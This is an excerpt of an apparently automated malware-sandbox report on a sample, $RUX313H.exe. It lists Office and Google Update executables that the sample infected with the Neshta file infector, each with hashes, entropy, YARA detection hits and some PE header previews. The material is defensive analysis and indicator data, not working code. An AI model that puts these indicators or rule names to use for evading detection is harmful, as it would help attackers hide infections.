                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.374994892226591
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                                        MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                                        SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                                        SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                                        SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.305732261424221
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                                        MD5:3A6E83146F925E67FD9BD350F823858C
                                                                        SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                                        SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                                        SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.375840229458048
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                                        MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                                        SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                                        SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                                        SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.461871956296466
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                                        MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                                        SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                                        SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                                        SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):5.119504084682648
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                                        MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                                        SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                                        SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                                        SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):4.799951544005101
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                                        MD5:7078371E0D358B86D46D6CF87987C8CD
                                                                        SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                                        SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                                        SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.05148718063145
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                                        MD5:D4B144B9963B3114F1D938F44200AE62
                                                                        SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                                        SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                                        SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.365915780903398
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                                        MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                                        SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                                        SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                                        SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.420838658743323
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                                        MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                                        SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                                        SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                                        SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.364257425575085
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                                        MD5:9180D3CEE013A6DE40DD963A16951734
                                                                        SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                                        SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                                        SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.435519044418047
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                                        MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                                        SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                                        SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                                        SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.278417014765199
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                                        MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                                        SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                                        SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                                        SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, Author: Joe Security
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.254081989191424
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                                        MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                                        SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                                        SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                                        SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.565853286242963
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                                        MD5:2BE98153912196C9044AB31250DEAF28
                                                                        SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                                        SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                                        SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.517183428602308
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                                        MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                                        SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                                        SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                                        SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.31341198420156
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                                        MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                                        SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                                        SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                                        SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.571220400525005
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                                        MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                                        SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                                        SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                                        SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.35638621946935
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                                        MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                                        SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                                        SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                                        SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.572547877647106
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                                        MD5:FDB7DA820D2F539A317A598BA31067C8
                                                                        SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                                        SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
                                                                        SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.571346004771877
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                                        MD5:5BC82420D22E028C2481B8150AD4F793
                                                                        SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
                                                                        SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                                        SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Joe Security
                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.5964179831347325
                                                                        Encrypted:false
